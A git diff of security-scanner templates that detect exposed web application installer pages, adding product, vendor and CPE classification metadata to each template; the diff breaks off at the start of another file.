100644 --- a/http/misconfiguration/installer/orangehrm-installer.yaml +++ b/http/misconfiguration/installer/orangehrm-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"OrangeHRM Web Installation Wizard" + product: orangehrm + vendor: orangehrm tags: misconfig,exposure,install,orangehrm + classification: + cpe: cpe:2.3:a:orangehrm:orangehrm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de5cdc54a739f1ecb3c6109c731d472175baaa0f6a7368617da7c527f7518d9902200f1c925005e091baa368e4a91875d1b0ff186b7ff861be917db186e20546010d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de5cdc54a739f1ecb3c6109c731d472175baaa0f6a7368617da7c527f7518d9902200f1c925005e091baa368e4a91875d1b0ff186b7ff861be917db186e20546010d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/orangescrum-install.yaml b/http/misconfiguration/installer/orangescrum-install.yaml index dc3b40d20f..b78c5d8d0d 100644 --- a/http/misconfiguration/installer/orangescrum-install.yaml +++ b/http/misconfiguration/installer/orangescrum-install.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Orangescrum Setup Wizard" + product: orangescrum + vendor: orangescrum tags: misconfig,orangescrum,install + classification: + cpe: cpe:2.3:a:orangescrum:orangescrum:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml index a5d2de7897..6ce153ec4b 100644 --- a/http/misconfiguration/installer/orchard-installer.yaml +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Orchard Setup - Get Started" + product: orchard + vendor: orchardproject tags: misconfig,exposure,install,orchard + classification: + cpe: cpe:2.3:a:orchardproject:orchard:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/owncloud-installer-exposure.yaml b/http/misconfiguration/installer/owncloud-installer-exposure.yaml index 39b5915add..21579a6bf9 100644 --- a/http/misconfiguration/installer/owncloud-installer-exposure.yaml +++ b/http/misconfiguration/installer/owncloud-installer-exposure.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: title:"owncloud" + product: owncloud + vendor: owncloud tags: misconfig,owncloud,exposure,install + classification: + cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c51b290ea4f0c4547ea5dd2370b29889e8c0105de44f20cfce4e3cec2825f4102206c4cc3755344812222a95c7596b92586525488047be86c030757b0b99c434e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c51b290ea4f0c4547ea5dd2370b29889e8c0105de44f20cfce4e3cec2825f4102206c4cc3755344812222a95c7596b92586525488047be86c030757b0b99c434e4f:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/oxid-eshop-installer.yaml b/http/misconfiguration/installer/oxid-eshop-installer.yaml index 3afdf042b7..d18ecc6787 100644 --- a/http/misconfiguration/installer/oxid-eshop-installer.yaml +++ b/http/misconfiguration/installer/oxid-eshop-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"OXID eShop installation" + product: eshop + vendor: oxid-esales tags: misconfig,oxid,eshop,install,exposure + classification: + cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6d13f67c47d1727a0a5a423b32f7b4459c40ca4298e8205d0e8aa1494091cdd02210098ee4164fa72dacf08cdc735297af64aa274e73054efa51adb4bc9bf21b5ead3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6d13f67c47d1727a0a5a423b32f7b4459c40ca4298e8205d0e8aa1494091cdd02210098ee4164fa72dacf08cdc735297af64aa274e73054efa51adb4bc9bf21b5ead3:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/pagekit-installer.yaml b/http/misconfiguration/installer/pagekit-installer.yaml index 0d72734f4d..c40ec24d36 100644 --- a/http/misconfiguration/installer/pagekit-installer.yaml +++ b/http/misconfiguration/installer/pagekit-installer.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: title:"Pagekit Installer" + product: pagekit + vendor: pagekit tags: misconfig,pagekit,install,exposure + classification: + cpe: cpe:2.3:a:pagekit:pagekit:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acdc3214fb55521959de012b7c14c0dd5b3afd9fdf7c37ce15bb3127881c368a0220406c6e133039e22f73a5d297bfa835190899a845f8b6191b2ba29231ebf80ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100acdc3214fb55521959de012b7c14c0dd5b3afd9fdf7c37ce15bb3127881c368a0220406c6e133039e22f73a5d297bfa835190899a845f8b6191b2ba29231ebf80ceb:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml index c70fc9f577..fca795cd71 100644 --- a/http/misconfiguration/installer/pandora-fms-installer.yaml +++ b/http/misconfiguration/installer/pandora-fms-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: body="Pandora FMS - Installation Wizard" + product: pandora_fms + vendor: pandorafms tags: misconfig,install,exposure,pandora-fms + classification: + cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/permissions-installer.yaml b/http/misconfiguration/installer/permissions-installer.yaml index 03bb5e6c78..7120742045 100644 --- a/http/misconfiguration/installer/permissions-installer.yaml +++ b/http/misconfiguration/installer/permissions-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:" Permissions | Installer" + product: permissions + vendor: suse tags: misconfig,permissions,install,exposure + classification: + cpe: cpe:2.3:a:suse:permissions:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce20244086b4d44e96b0e4b2e608e20a212e7cb59a227ad8fa29926711e33612022072f3f53f63a25d55496eaea3aa2be1c131696b653d64ca4807d41e38a570b0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce20244086b4d44e96b0e4b2e608e20a212e7cb59a227ad8fa29926711e33612022072f3f53f63a25d55496eaea3aa2be1c131696b653d64ca4807d41e38a570b0d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/phpbb-installer.yaml b/http/misconfiguration/installer/phpbb-installer.yaml index 4b0e6b359f..ccf22d4876 100644 --- a/http/misconfiguration/installer/phpbb-installer.yaml +++ b/http/misconfiguration/installer/phpbb-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Installation Panel" + product: phpbb + vendor: phpbb tags: misconfig,phpbb,install,exposure + classification: + cpe: cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210087fc262cb360c9c8d8ee8da1a080617dea1385586bba8aeb2a25a099d9c5c55302210082fe0a042af08356fbfce93605835806ccdd1243e311d1db0318a52a9c80bbdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210087fc262cb360c9c8d8ee8da1a080617dea1385586bba8aeb2a25a099d9c5c55302210082fe0a042af08356fbfce93605835806ccdd1243e311d1db0318a52a9c80bbdd:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/phpgedview-installer.yaml b/http/misconfiguration/installer/phpgedview-installer.yaml index 868bacb8c6..8f1994632a 100644 --- a/http/misconfiguration/installer/phpgedview-installer.yaml +++ b/http/misconfiguration/installer/phpgedview-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"/phpgedview.db" + product: phpgedview + vendor: phpgedview tags: misconfig,phpgedview,install,exposure + classification: + cpe: cpe:2.3:a:phpgedview:phpgedview:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/phpipam-installer.yaml b/http/misconfiguration/installer/phpipam-installer.yaml index 85cd0540f5..c5ded7e750 100644 --- a/http/misconfiguration/installer/phpipam-installer.yaml +++ b/http/misconfiguration/installer/phpipam-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"phpipam installation wizard" + product: phpipam + vendor: phpipam tags: misconfig,exposure,install,phpipam + classification: + cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad58e4bdb9ab9f2cf7c89e9710d2b31b5c4a00e8536ee1d1d133a4249cb8d5ce0220464eec521102934eebfca522811ee5bd2d0a34c5d3b2b2a70f707c776a32c9dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad58e4bdb9ab9f2cf7c89e9710d2b31b5c4a00e8536ee1d1d133a4249cb8d5ce0220464eec521102934eebfca522811ee5bd2d0a34c5d3b2b2a70f707c776a32c9dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml index 8cd43c5d56..a91d92aec4 100644 --- a/http/misconfiguration/installer/phpmyfaq-installer.yaml +++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 fofa-query: "phpMyFAQ-setup" + product: phpmyfaq + vendor: phpmyfaq tags: misconfig,phpmyfaq,install + classification: + cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: part: header words: - 'phpmyfaq-setup' -# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/phpwind-installer.yaml b/http/misconfiguration/installer/phpwind-installer.yaml index 4aac29878e..938049e536 100644 --- a/http/misconfiguration/installer/phpwind-installer.yaml +++ b/http/misconfiguration/installer/phpwind-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Powered by phpwind" + product: phpwind + vendor: phpwind tags: misconfig,phpwind,exposure,install + classification: + cpe: cpe:2.3:a:phpwind:phpwind:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210083cf74f4b0597c70df0689a90bc8c49c0fa4b549b6e30674e56251994ab97f220221008ccbf5fdf5d0ffdf830351a5f6e3ceffacbd13f2cc3120323b48a9d79ef7c119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083cf74f4b0597c70df0689a90bc8c49c0fa4b549b6e30674e56251994ab97f220221008ccbf5fdf5d0ffdf830351a5f6e3ceffacbd13f2cc3120323b48a9d79ef7c119:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml index 7c72cbb798..4a1a23aacb 100644 --- a/http/misconfiguration/installer/piwigo-installer.yaml +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: html:"Piwigo" html:"- Installation" + product: piwigo + vendor: piwigo tags: misconfig,exposure,install,piwigo + classification: + cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eeddac8af33ba19fd2bfab6bbd54b0161f3c93e0247010be93bceee0da5c140402207100dd147f60943aaa53e1183e09e7886871302d663be5d0b0dcb97c7b9f11fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eeddac8af33ba19fd2bfab6bbd54b0161f3c93e0247010be93bceee0da5c140402207100dd147f60943aaa53e1183e09e7886871302d663be5d0b0dcb97c7b9f11fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/pmm-installer.yaml b/http/misconfiguration/installer/pmm-installer.yaml index b633dbafdf..02f5332d29 100644 --- a/http/misconfiguration/installer/pmm-installer.yaml +++ b/http/misconfiguration/installer/pmm-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"PMM Installation Wizard" + product: monitoring_and_management + vendor: percona tags: misconfig,exposure,install,pmm + classification: + cpe: cpe:2.3:a:percona:monitoring_and_management:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e17140e1a9563e94bf1baead9a092319666bf36480dffafa9a21a63b9fcdb391022100c03f393fedc23e1b9eb11a2b1596fbec8332f45bbeb496c84d76dbbfc7f214a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e17140e1a9563e94bf1baead9a092319666bf36480dffafa9a21a63b9fcdb391022100c03f393fedc23e1b9eb11a2b1596fbec8332f45bbeb496c84d76dbbfc7f214a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/poste-io-installer.yaml b/http/misconfiguration/installer/poste-io-installer.yaml index aa207d3199..ac092b87cc 100644 --- a/http/misconfiguration/installer/poste-io-installer.yaml +++ b/http/misconfiguration/installer/poste-io-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 fofa-query: body="Initial server configuration" + product: poste.io + vendor: analogic tags: misconfig,exposure,poste-io,install + classification: + cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/prestashop-installer.yaml b/http/misconfiguration/installer/prestashop-installer.yaml index 2499fdb79d..e66944616e 100644 --- a/http/misconfiguration/installer/prestashop-installer.yaml +++ b/http/misconfiguration/installer/prestashop-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"PrestaShop Installation Assistant" + product: prestashop + vendor: prestashop tags: misconfig,prestashop,exposure,install + classification: + cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a30533126e8bda3720627039bfd0a31e2f2bbd17cc62c347b3ddbf8acbf870970220314eed5d5caf09735ef9d5d9c106f5311ffba5d158bc5777b5cd8bcd62903801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a30533126e8bda3720627039bfd0a31e2f2bbd17cc62c347b3ddbf8acbf870970220314eed5d5caf09735ef9d5d9c106f5311ffba5d158bc5777b5cd8bcd62903801:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/processwire-installer.yaml b/http/misconfiguration/installer/processwire-installer.yaml index 3413df4eae..5d82234006 100644 --- a/http/misconfiguration/installer/processwire-installer.yaml +++ b/http/misconfiguration/installer/processwire-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 shodan-query: title:"ProcessWire 3.x Installer" + product: processwire + vendor: processwire tags: misconfig,processwire,install,exposure + classification: + cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9040333d464ee74f38bb8f6bf7f9ebce6d974486b7350ee3cad1e01ac28f9d702205d65792631cf1873f7669e346c45e7bc7e29e2ded46d3f11fe0847a25cac5801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9040333d464ee74f38bb8f6bf7f9ebce6d974486b7350ee3cad1e01ac28f9d702205d65792631cf1873f7669e346c45e7bc7e29e2ded46d3f11fe0847a25cac5801:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml index 1283a50d5c..f7766545bd 100644 --- a/http/misconfiguration/installer/projectsend-installer.yaml +++ b/http/misconfiguration/installer/projectsend-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"ProjectSend setup" + product: projectsend + vendor: projectsend tags: misconfig,install,exposure,projectsend + classification: + cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022041d7f7b7fc7194bc9ecab9aec4682b69587b2a03b9dcebf694cfd9e85688754202206bdf942b3342aebf617db7fabc9e276da0cebb2f27a5e585310e85b9ac04210f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041d7f7b7fc7194bc9ecab9aec4682b69587b2a03b9dcebf694cfd9e85688754202206bdf942b3342aebf617db7fabc9e276da0cebb2f27a5e585310e85b9ac04210f:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml index ac329ec307..935753ea65 100644 --- a/http/misconfiguration/installer/qloapps-installer.yaml +++ b/http/misconfiguration/installer/qloapps-installer.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 fofa-query: title="QloApps Installation" + product: qloapps + vendor: webkul tags: install,qloapps,misconfig,exposure + classification: + cpe: cpe:2.3:a:webkul:qloapps:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/redash-installer.yaml b/http/misconfiguration/installer/redash-installer.yaml index ab2d1faa4e..a5b987353b 100644 --- a/http/misconfiguration/installer/redash-installer.yaml +++ b/http/misconfiguration/installer/redash-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Redash Initial Setup" + product: redash + vendor: redash tags: misconfig,redash,install + classification: + cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064f031391e9c6c891e951110b7f75ed21337e7a8022dd361580d20ee11805d40022100c9ef80338c794a6b3fcad1bd780b60806001a47582fd37a6a8447e86052ebe54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064f031391e9c6c891e951110b7f75ed21337e7a8022dd361580d20ee11805d40022100c9ef80338c794a6b3fcad1bd780b60806001a47582fd37a6a8447e86052ebe54:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/sabnzbd-installer.yaml b/http/misconfiguration/installer/sabnzbd-installer.yaml index 208240ae99..26f29ba9a9 100644 --- a/http/misconfiguration/installer/sabnzbd-installer.yaml +++ b/http/misconfiguration/installer/sabnzbd-installer.yaml @@ -13,8 +13,12 @@ info: max-request: 2 shodan-query: html:"SABnzbd Quick-Start Wizard" fofa-query: body="SABnzbd Quick-Start Wizard" + product: sabnzbd + vendor: sabnzbd tags: sabnzbd,wizard,installer,misconfig + classification: + cpe: cpe:2.3:a:sabnzbd:sabnzbd:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0f82c995b6a686d3028d757d7b32b9cfe867077f24b73d12bb70b78cb1f07b1022100d39bd3dfca7af6030eb799c7a3edf07645f7b7f2b2943901ef8a999c2be63e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0f82c995b6a686d3028d757d7b32b9cfe867077f24b73d12bb70b78cb1f07b1022100d39bd3dfca7af6030eb799c7a3edf07645f7b7f2b2943901ef8a999c2be63e16:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/server-monitor-installer.yaml b/http/misconfiguration/installer/server-monitor-installer.yaml index 41890a5737..0a1d1f3c20 100644 --- a/http/misconfiguration/installer/server-monitor-installer.yaml +++ b/http/misconfiguration/installer/server-monitor-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"SERVER MONITOR - Install" + product: pa_server_monitor + vendor: poweradmin tags: misconfig,monitor,exposure,install + classification: + cpe: cpe:2.3:a:poweradmin:pa_server_monitor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b7f436c2808b9457a5469cf8930b006f5036ddbbeb702b60e3ef3999214897502210089fb2e4bdeddc5880309778bfe3a18bd092f8eb7dacd6cfac5c30ccad01789ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b7f436c2808b9457a5469cf8930b006f5036ddbbeb702b60e3ef3999214897502210089fb2e4bdeddc5880309778bfe3a18bd092f8eb7dacd6cfac5c30ccad01789ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml index cfaa8ef618..ea62462364 100644 --- a/http/misconfiguration/installer/setup-github-enterprise.yaml +++ b/http/misconfiguration/installer/setup-github-enterprise.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1373456171 + product: enterprise_server + vendor: github tags: misconfig,installer,github,setup + classification: + cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/shopware-installer.yaml b/http/misconfiguration/installer/shopware-installer.yaml index a733acf4be..3cb835607a 100644 --- a/http/misconfiguration/installer/shopware-installer.yaml +++ b/http/misconfiguration/installer/shopware-installer.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 fofa-query: title="Installation | Shopware 6" + product: shopware + vendor: shopware tags: misconfig,shopware,install,exposure + classification: + cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/smf-installer.yaml b/http/misconfiguration/installer/smf-installer.yaml index 37209e7153..8ba36f3413 100644 --- a/http/misconfiguration/installer/smf-installer.yaml +++ b/http/misconfiguration/installer/smf-installer.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"SMF Installer" + product: simple_machine_forum + vendor: simplemachines tags: misconfig,smf,install,exposure + classification: + cpe: cpe:2.3:a:simplemachines:simple_machine_forum:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220208d7404afcad5ede18fa45f5353583c132e2a86b100143fbe92f1ea44e4e2e0022057ca90a574c898e061c684a87d1e98d09c274353490e4fce4e4fc597ff7edc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220208d7404afcad5ede18fa45f5353583c132e2a86b100143fbe92f1ea44e4e2e0022057ca90a574c898e061c684a87d1e98d09c274353490e4fce4e4fc597ff7edc69:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml b/http/misconfiguration/installer/snipe-it-installer.yaml index ce1ce6709b..12d0bf6411 100644 --- a/http/misconfiguration/installer/snipe-it-installer.yaml +++ b/http/misconfiguration/installer/snipe-it-installer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"Snipe-IT Setup" + product: snipe-it + vendor: snipeitapp tags: misconfig,install,exposure,snipe-it + classification: + cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/spa-cart-installer.yaml b/http/misconfiguration/installer/spa-cart-installer.yaml index be1b1404b0..13ffd09108 100644 --- a/http/misconfiguration/installer/spa-cart-installer.yaml +++ b/http/misconfiguration/installer/spa-cart-installer.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 fofa-query: title="SPA Cart Installation" + product: spa-cart + vendor: spa-cart tags: spa-cart,exposure,installer,misconfig + classification: + cpe: cpe:2.3:a:spa-cart:spa-cart:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/installer/subrion-installer.yaml 